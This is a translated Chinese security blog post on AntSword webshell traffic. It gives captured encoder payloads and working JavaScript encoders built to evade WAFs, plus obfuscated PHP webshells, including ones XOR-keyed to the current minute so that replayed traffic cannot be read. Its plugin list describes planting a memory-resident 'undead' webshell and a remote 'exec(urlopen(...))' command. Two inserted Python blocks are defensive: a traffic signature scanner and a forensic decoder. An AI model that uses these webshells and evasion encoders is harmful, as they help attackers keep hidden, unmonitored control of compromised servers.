AntSword Traffic Obfuscation and Plugin Collection

admin · 2024-09-28 13:45:42

For the plugins, follow the WeChat public account and reply with “蚁剑”.

Original traffic characteristics

UA header

Current higher versions of AntSword pick the UA header at random; lower versions use antSword/v2.1.

It can be changed in /modules/request.js:

// Request UA
const USER_AGENT = require('random-fake-useragent');
const { unescape } = require('querystring');

Base64 encoder

POST /vul/unsafeupload/uploads/1.php HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0
Content-Length: 4504

ce17f0873fa1f6=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&j22258186cce69=1l&sffbb6e19a6473=MQY21k&x632a79aec6ff3=6MY2QgL2QgIkQ6XFxwaHBzdHVkeV9wcm9cXFdXV1xccGlrYWNodVxcdnVsXFx1bnNhZmV1cGxvYWRcXHVwbG9hZHMiJndob2FtaSZlY2hvIDJjODI4JmNkJmVjaG8gMGYzNTMyMw==&xxy=@eval(@base64_decode($_POST['ce17f0873fa1f6']));

The Base64 encoder works roughly like this: all the intermediate operation functions are base64-encoded and finally executed with eval(base64_decode()). In this process, however, eval() and base64_decode are recognized and the request is blocked.

chr encoder

POST /vul/unsafeupload/uploads/1.php HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; de) Presto/2.9.168 Version/11.52
Content-Length: 27138

p6b4bef7012f21=ub&t8def9d1ac14f9=PJY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDM0ODUxJmNkJmVjaG8gNDEyMzY%3D&v9585f4ec5830f=7kY21k&xxy=%40eVAl(cHr(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(100).ChR(105).ChR(115).ChR(112).ChR(108).ChR(97).ChR(121).ChR(.......

As can be seen, with the chr encoder all operation functions are encoded through CHR() and then executed with eval. This method bypasses SafeDog directly.

chr16 encoder

POST /vul/unsafeupload/uploads/1.php HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 31892

ca9a2d11387c7e=2U&qc17c36e9b7b25=ITY21k&rfb799084cba76=LHY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDlhODI4MzgxNGUxJmNkJmVjaG8gYzA4N2MyYw%3D%3D&xxy=%40eVAl(cHr(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x28).ChR(0x22).ChR(0x64).ChR(0x69).ChR(0x73).ChR(0x70).ChR(0x6c).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x65).ChR(0x72).ChR(0x72).ChR(0x6f).

The chr16 encoding differs little from chr: all operation functions are again encoded through CHR() and executed with eval, only the character codes are written in hexadecimal.

rot13 encoder

With rot13 encoding, all the intermediate functions are rot13-encoded so that no key function names appear in the body, and eval(str_rot13()) is used at the end.


default encoder

ca1c21df2b501a=luY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDRkMTFmYzImY2QmZWNobyBkMjUwOTFhNA==&p72ba1eefea205=rM&vcd1fb13a5c712=zbY21k&xxy=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.3ff308";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\|//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "a8e57"."c6a20";echo @asenc($output);echo "56"."4dd";}ob_start();try{$p=base64_decode(substr($_POST["vcd1fb13a5c712"],2));$s=base64_decode(substr($_POST["ca1c21df2b501a"],2));$envstr=@base64_decode(substr($_POST["p72ba1eefea205"],2));$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";if(substr($d,0,1)=="/"){@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");}else{@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");}if(!empty($envstr)){$envarr=explode("|||asline|||", $envstr);foreach($envarr as $v) {if (!empty($v)) {@putenv(str_replace("|||askey|||", "=", $v));}}}$r="{$p} {$c}";function fe($f){$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=array();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runshellshock($d, $c) {if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {if (strstr(readlink("/bin/sh"), "bash") != FALSE) {$tmp = 
tempnam(sys_get_temp_dir(), 'as');putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (fe('error_log')) {error_log("a", 1);} else {mail("[email protected]", "", "", "-bv");}} else {return False;}$output = @file_get_contents($tmp);@unlink($tmp);if ($output != "") {print($output);return True;}}return False;};function runcmd($c){$ret=0;$d=dirname($_SERVER["SCRIPT_FILENAME"]);if(fe('system')){@system($c,$ret);}elseif(fe('passthru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}elseif(fe('exec')){@exec($c,$o,$ret);print(join("
",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}elseif(fe('proc_open')){$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);while(!@feof($io[1])){print(@fgets($io[1],2048));}while(!@feof($io[2])){print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2]);@proc_close($p);}elseif(fe('antsystem')){@antsystem($c);}elseif(runshellshock($d, $c)) {return $ret;}elseif(substr($d,0,1)!="/" && @class_exists("COM")){$w=new COM('WScript.shell');$e=$w->exec($c);$so=$e->StdOut();$ret.=$so->ReadAll();$se=$e->StdErr();$ret.=$se->ReadAll();print($ret);}else{$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

Its signature is @ini_set.

Modifying AntSword's traffic obfuscation

b64pass encoder

/**
 * php::b64pass encoder
 *
 * base64-encodes every POST parameter
 *
 * Applicable shell:
 *
 * <?php @eval(base64_decode($_POST['ant']));?>
 *
 */

'use strict';

module.exports = (pwd, data) => {
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  data[randomID] = Buffer.from(data['_']).toString('base64');
  data[pwd] = Buffer.from(`eval(base64_decode($_POST[${randomID}]));die();`).toString('base64');
  delete data['_'];
  return data;
}
ant=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtfMHgxNmYwMzNjOTZmYmNjXSkpO2RpZSgpOw==&e84c55a2d1a848=HOY21k&jc3785466b27d1=rg&v530a18e4810bc=hNY2QgL2QgIkQ6XFxwaHBzdHVkeV9wcm9cXFdXV1xccGlrYWNodVxcdnVsXFx1bnNhZmV1cGxvYWRcXHVwbG9hZHMiJndob2FtaSZlY2hvIDljNjJhNmZhZGQxJmNkJmVjaG8gOGYzZTE2MzgzYg==

The eval(base64_decode()) from the plain Base64 packet is base64-encoded once more, which bypasses the security device's interception of it.

Double b64 encoder

/**
 * php::base64 encoder
 * Create at: 2020/11/21 15:21:10
 */

'use strict';

/*
* @param  {String} pwd   connection password
* @param  {Array}  data  payload array before the encoder runs
* @return {Array}  data  payload array after the encoder runs
*/
module.exports = (pwd, data, ext={}) => {
  // ##########    Write your own code below   ###################
  // The code below is the PHP Base64 sample

  // Generate a random variable name
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  // The original payload is in data['_'];
  // take it out and base64-encode it in place
  data['_'] = Buffer.from(data['_']).toString('base64');

  // When the shell receives the payload it first processes the content under the pwd parameter,
  //data[pwd] = `${data['_']}"));`;
  data[pwd] = Buffer.from(data['_']).toString('base64');

  // ##########    Write your own code above   ###################

  // Delete the original payload under _
  delete data['_'];
  // Return the payload array processed by the encoder
  return data;
}

Use the following webshell:

<?php 
header('HTTP/1.1 404');
class COMI { 
    public $c='';
    function __destruct() {
        return eval(substr($this->c, 0));
    }
}
$comi = new COMI();
$password = &$password1;
$password1 = $_REQUEST['password'];
$post = &$password;
$post=base64_decode(base64_decode($post));
$lnng1 = &$lnng;
$lnng = $post;
$lnng2 = $lnng1;
@$comi->c = substr($lnng2, 0);
?>
kaba7e5c4d23f=1kY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDg4MDFhJmNkJmVjaG8gZjZmYTQ4Y2Y3&password=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%3D&s01f4f3921efb4=bf&x7121316358fb9=A0Y21k

The traffic is fully obfuscated.

Base64-decoding the traffic twice recovers the original data.
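The signature checks that the first section implies (eval(base64_decode(, eval(str_rot13(, chr()/CHR(0x..) chains, the @ini_set("display_errors" stub, the antSword/v2.1 UA) together with the base64 peeling that undoes the b64pass and double-b64 layering above, as one defender-side scanner. This is an added example, not code from the post or from AntSword; the request bodies in it are constructed, modelled on the captures shown above.

```python
"""Signature checks for the AntSword request bodies shown in this post.

Added example, not code from the post or from AntSword: URL-decode the body,
peel the nested base64 layers added by the b64pass and double-b64 encoders,
fold chr()/CHR(0x..) chains back into text, then match the markers the post
names. All request bodies below are constructed, not captured traffic.
"""
import base64
import re
from urllib.parse import parse_qsl, urlencode

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
CHR_ONE = r"chr\(\s*(?:0x[0-9a-f]+|\d+)\s*\)"
CHR_RE = re.compile(CHR_ONE + r"(?:\s*\.\s*" + CHR_ONE + r")+", re.I)
SIGNATURES = {
    "eval_base64": re.compile(r"eval\s*\(\s*@?base64_decode\s*\(", re.I),
    "eval_rot13": re.compile(r"eval\s*\(\s*@?str_rot13\s*\(", re.I),
    "chr_chain": CHR_RE,
    "antsword_stub": re.compile(r'@ini_set\("display_errors"'),
}
UA_SIGNATURE = "antSword/v2.1"  # fixed UA of the older versions

def peel_base64(value: str, max_layers: int = 3) -> list:
    """value plus each successive base64 decoding that yields readable text."""
    views, cur = [value], value.strip().replace(" ", "+")  # form decoding turned '+' into space
    for _ in range(max_layers):
        if len(cur) < 8 or len(cur) % 4 or not B64_RE.match(cur):
            break
        try:
            cur = base64.b64decode(cur).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break
        if not all(c.isprintable() or c in "\r\n\t" for c in cur):
            break
        views.append(cur)
    return views

def fold_chr_chains(text: str) -> str:
    """Replace chr(64).chr(105)... or CHR(0x40).CHR(0x69)... with the string it builds."""
    def fold(m):
        nums = re.findall(r"chr\(\s*(0x[0-9a-f]+|\d+)\s*\)", m.group(0), re.I)
        return "".join(chr(int(n, 16 if n.lower().startswith("0x") else 10)) for n in nums)
    return CHR_RE.sub(fold, text)

def scan_request(user_agent: str, body: str) -> set:
    """Names of the signatures found in a form-encoded POST body and its User-Agent."""
    hits = set()
    if UA_SIGNATURE in user_agent:
        hits.add("ua_antsword")
    for _, value in parse_qsl(body, keep_blank_values=True):
        for view in peel_base64(value):
            for name, rx in SIGNATURES.items():
                if rx.search(view) or rx.search(fold_chr_chains(view)):
                    hits.add(name)
    return hits

def b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()

# Constructed bodies modelled on the post's captures (default, base64, chr, rot13, double-b64).
STUB = '@ini_set("display_errors", "0");@set_time_limit(0);'
BODY_DEFAULT = urlencode({"xxy": STUB})
BODY_B64 = urlencode({"k": b64(STUB), "xxy": "@eval(@base64_decode($_POST['k']));"})
BODY_CHR = urlencode({"xxy": "@eVAl(" + ".".join(f"ChR({ord(c)})" for c in STUB) + ")"})
BODY_ROT13 = urlencode({"k": "cucvasb();", "xxy": "@eval(@str_rot13($_POST['k']));"})
BODY_DOUBLE = urlencode({"password": b64(b64(STUB))})
BENIGN = "page=2&sort=name"
```

Peeling stops at the first layer that is not printable text, so binary uploads are not mistaken for encoded payloads.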

Time-based dynamic key encoder

'use strict';
// Time-based AntSword dynamic-key encoder
// link: https://yzddmr6.tk/posts/antsword-xor-encoder/
// code by yzddmr6
/* Server side
<?php
date_default_timezone_set("PRC");
@$post=base64_decode($_REQUEST['yzddmr6']);
$key=md5(date("Y-m-d H:i",time()));
for($i=0;$i<strlen($post);$i++){
    $post[$i] = $post[$i] ^ $key[$i%32];
}
eval($post);
?>
*/
module.exports = (pwd, data, ext={}) => {
  function xor(payload){
    let crypto = require('crypto');
    Object.assign(Date.prototype, {
      switch (time) {
        let date = {
          "yy": this.getFullYear(),
          "MM": this.getMonth() + 1,
          "dd": this.getDate(),
          "hh": this.getHours(),
          "mm": this.getMinutes(),
          "ss": this.getSeconds()
        };
        if (/(y+)/i.test(time)) {
          time = time.replace(RegExp.$1, (this.getFullYear() + '').substr(4 - RegExp.$1.length));
        }
        Object.keys(date).forEach(function (i) {
          if (new RegExp("(" + i + ")").test(time)) {
            if (RegExp.$1.length == 2) {
              date[i] < 10 ? date[i] = '0' + date[i] : date[i];
            }
            time = time.replace(RegExp.$1, date[i]);
          }
        });
        return time;
      }
    });

    let newDate = new Date();
    let time = newDate.switch('yyyy-MM-dd hh:mm');
    let key = crypto.createHash('md5').update(time).digest('hex');
    key = key.split("").map(t => t.charCodeAt(0));
    //let payload="phpinfo();";
    let cipher = payload.split("").map(t => t.charCodeAt(0));
    for(let i=0;i<cipher.length;i++){
      cipher[i] = cipher[i]^key[i%32];
    }
    cipher = cipher.map(t=>String.fromCharCode(t)).join("");
    cipher = Buffer.from(cipher).toString('base64');
    //console.log(cipher)
    return cipher;
  }

  data['_'] = Buffer.from(data['_']).toString('base64');
  data[pwd] = `eval(base64_decode("${data['_']}"));`;
  data[pwd] = xor(data[pwd]);

  delete data['_'];
  return data;
}

This encoder uses the md5 of the current time as the key, XORs the payload with it and transmits the result in base64. When the shell receives the encoded data it first base64-decodes it and then XORs it once more with the md5 of the time to recover the plaintext.

Corresponding webshell:

<?php 
header('HTTP/1.1 404');
class COMI { 
    public $c='';
    function __destruct() {
        return eval(substr($this->c, 0));
    }
}
date_default_timezone_set("PRC");
$comi = new COMI();
$password = &$password1;
$password1 = $_REQUEST['x'];
$post = &$password;
$post=base64_decode($post);
$key=md5(date("Y-m-d H:i",time()));
for($i=0;$i<strlen($post);$i++){
    $post[$i] = $post[$i] ^ $key[$i%32];
}
$lnng1 = &$lnng;
$lnng = $post;
$lnng2 = $lnng1;
@$comi->c = substr($lnng2, 0);
?>

At this point no sensitive traffic can be detected any more.

A further advantage of the time-based obfuscation is that if someone later wants to replay the traffic to find out what this code executed, that is not achievable, because the corresponding time no longer matches; the specific operation of the code therefore cannot be known at all.
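The decoder a responder would use for the time-based encoder above; this is an added example, not code from the post or from yzddmr6's encoder. Because the key is md5 of the shell's local minute, date("Y-m-d H:i") under date_default_timezone_set("PRC"), the request's access-log or pcap timestamp is enough to rebuild it and read the payload, so the replay argument above holds only for someone without that timestamp. Assumed: PRC is a fixed UTC+8, the x= value is taken from the raw request body, and the sample capture is constructed.

```python
"""Forensic decoder for the time-based XOR encoder above.

Added example, not code from the post or from yzddmr6's encoder. The key is
md5 of the shell's local minute, date("Y-m-d H:i") in the PRC zone (UTC+8),
so an analyst holding the request's timestamp from the access log or pcap can
rebuild the key and read what eval() received. XOR is symmetric, so the same
routine also produces the constructed sample used below.
"""
import base64
import hashlib
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

SHELL_TZ = timezone(timedelta(hours=8))  # date_default_timezone_set("PRC"); no DST


def minute_key(capture_utc: datetime) -> bytes:
    """md5(date("Y-m-d H:i")) exactly as the shell computes it at that instant."""
    local = capture_utc.astimezone(SHELL_TZ)
    return hashlib.md5(local.strftime("%Y-%m-%d %H:%M").encode()).hexdigest().encode()


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Byte-wise XOR with key[i % 32]; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_request_param(x_value: str, capture_utc: datetime) -> str:
    """Recover the PHP that eval() receives from the raw, URL-encoded x= value.

    The encoder wraps the real code as eval(base64_decode("...")); when that
    wrapper is found the inner code is returned, otherwise the XOR output as-is
    (which is unreadable when capture_utc falls in the wrong minute).
    """
    cipher = base64.b64decode(unquote(x_value))  # '+' arrives as %2B, so unquote, not unquote_plus
    wrapper = xor_with_key(cipher, minute_key(capture_utc)).decode("latin-1")
    m = re.fullmatch(r'eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);', wrapper)
    return base64.b64decode(m.group(1)).decode("utf-8", "replace") if m else wrapper


def build_sample(php_code: str, sent_utc: datetime) -> str:
    """Constructed sample: the x= value the encoder would emit for php_code at sent_utc."""
    inner = base64.b64encode(php_code.encode()).decode()
    wrapper = f'eval(base64_decode("{inner}"));'.encode()
    return base64.b64encode(xor_with_key(wrapper, minute_key(sent_utc))).decode()


# Constructed capture: the access log (UTC) places the request at 04:14:59Z,
# i.e. 12:14 local time at the shell, which is the minute the key came from.
SAMPLE_UTC = datetime(2024, 9, 28, 4, 14, 59, tzinfo=timezone.utc)
SAMPLE_UTC_NEXT_MINUTE = SAMPLE_UTC + timedelta(seconds=6)
SAMPLE_X = build_sample('echo "probe";', SAMPLE_UTC)

if __name__ == "__main__":
    print(decode_request_param(SAMPLE_X, SAMPLE_UTC))              # echo "probe";
    print(decode_request_param(SAMPLE_X, SAMPLE_UTC_NEXT_MINUTE))  # unreadable: key changed
```

A request logged within a second or two of a minute boundary may have been encoded in the adjacent minute, so try the neighbouring minute as well when the wrapper does not parse.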

RSA encoder

Only AntSword versions above 2.1 support RSA for PHP.

The RSA approach relies on asymmetric encryption: the transmitted content is first encrypted with the private key, and after it reaches the shell, the shell decrypts it with the public key, which obfuscates the traffic. How RSA itself works is not covered here, but the RSA encoder has a prerequisite: the openssl module must be enabled.

/**
 * php::RSA encoder
 * Create at: 2021/03/02 15:27:33
 */

'use strict';

/*
 * @param  {String} pwd   connection password
 * @param  {Array}  data  payload array before the encoder runs
 * @return {Array}  data  payload array after the encoder runs
 */
module.exports = (pwd, data, ext={}) => {
  data["_"] = `if((time()-${parseInt((new Date().getTime())/1000)})>5){die();};${data['_']}`;
  let n = Math.ceil(data['_'].length / 80);
  let l = Math.ceil(data['_'].length / n);
  let r = [];
  for (var i = 0; n > i; i++) {
    r.push(ext['rsa'].encryptPrivate(data['_'].substr(i * l, l), 'base64'));
  }
  data[pwd] = r.join("|");
  delete data['_'];
  return data;
}
data["_"] = `if((time()-${parseInt((new Date().getTime())/1000)})>5){die();};${data['_']}`;

This line is added to the encoder to give the data a validity period: after 5 seconds the data expires and becomes die().


AntSword plugin introduction


Copy the plugin directory into antSword/antData/plugins/ and the plugin is installed.

  • as_bypass_php_disable_functions

    Breaks out of disable_functions to run system commands and bypasses security mechanisms such as open_basedir

  • AS_BugScan

    BugScan node creation plugin: creates a BugScan node through the WebShell

    Usage

    Type python -V in a terminal. If it prints a version you can continue; if python is not found, add python to the environment variables first.

    Open BugScan and enter the scanner. Click Add Task and obtain your personal node-creation link under the Nodes sub-tab.

    If the page shows:

       python -c "exec(__import__('urllib2').urlopen('http://t.cn/Rqu1SmB?xxxxxxx').read())" -m 5

    then the URL field of this plugin should be filled with the URL from the urlopen call:

       http://t.cn/Rqu1SmB?xxxxxxx

    The “Max tasks” input box controls the maximum number of targets a node will accept; the default is 5.

    Click Start to try to create the BugScan node. Once created, the node appears on the BugScan Add Task page.

    1. In the virtual terminal, check that Python 2.7 is in the environment variables

  • as_jwtdebugger

    AntSword JWT debugging plugin

  • as_messycoderecover

    Tries to recover garbled text. Not all garbled text can be recovered perfectly: a question mark in the garbled text means that character is already lost and cannot be recovered

  • as_netstat

    AntSword plugin for viewing network connection status

  • as_plugin_godofhacker

    The hacker's magic tool; whoever uses it knows!

  • as_plugin_import_shell_from_csv

    Batch-imports shells from a CSV file

  • AS_Redis

    AntSword Redis management plugin; requires AntSword >= 2.0.3

  • as_scanwebshell

    Finds backdoor webshells by regex matching

  • as_webshell_venom

    webshell-venom, AntSword edition

  • check_rwx-suid

    1. Queries the target server for readable, writable and executable directories and for files usable for SUID privilege escalation (supports asp and aspx on Windows and php on Linux)

    2. asp and aspx shells perform the operation by uploading a separate detect.asp(x) file (clicking the “User” button pops up a confirmation dialog; after confirming, the file is generated on the server). Once generated, open detect.asp(x) in the webshell directory, enter the range to check and run it

  • GenShell

    AntSword shell generation plugin: generates a shell from a user-entered or randomly generated password

  • inject_und3ad

    Plants an undead PHP webshell on the target server

    Click the remote-file button in the top left, enter the remote control file address and the polling interval (in seconds), then confirm (the separator is ###)

    For example: http://192.168.134.128/1.txt###60 polls the content of http://192.168.134.128/1.txt every 60 seconds

    The file content is something like file_put_contents('./1.php','<?php @eval($_POST[xxy]); ?>'); (the password and the path can be customized; the content is meant to write a small shell every so often)

    The above uses PHP features to plant an undead webshell: after it runs, the webshell requests the user-set remote file address at the user-set polling interval, and the user only has to put the command to run into the remote txt file.

    After running, this webshell deletes itself and stays resident in memory, leaving no file behind

    Removal methods include restarting the web service, among others

    After the undead webshell is planted, the remote control file address is recorded and is shown under “History of remote control files” the next time this screen is opened

  • LiveScan

    AntSword webshell liveness check plugin

    1. Determines whether a webshell is alive by requesting it and checking whether the returned data is consistent

    2. Works only for PHP, ASP and ASPX

    3. One click to move lost webshells to the [.Trash] category

    4. One click to empty the [.Trash] category

  • PortScan

    AntSword port scanning plugin: scans specified ports of servers on the internal network through the WebShell

  • SuperTerm

    AntSword interactive terminal plugin: creates an interactive terminal through the WebShell

  • ExecScript

    AntSword custom script execution: runs custom php, asp and aspx scripts on the target host


Plugins:

Link: https://pan.baidu.com/s/1w3fW4721OALvClGoULSc3g
Extraction code: 0117


Originally published on the WeChat public account 深度网络安全实验室: “蚁剑的流量混淆和插件合集【武装 启动!】”

Published by admin on 2024-09-28 13:45:42. Please keep this link when reposting (CN-SEC: thanks to the original author for their work): https://cn-sec.com/archives/1994206.html
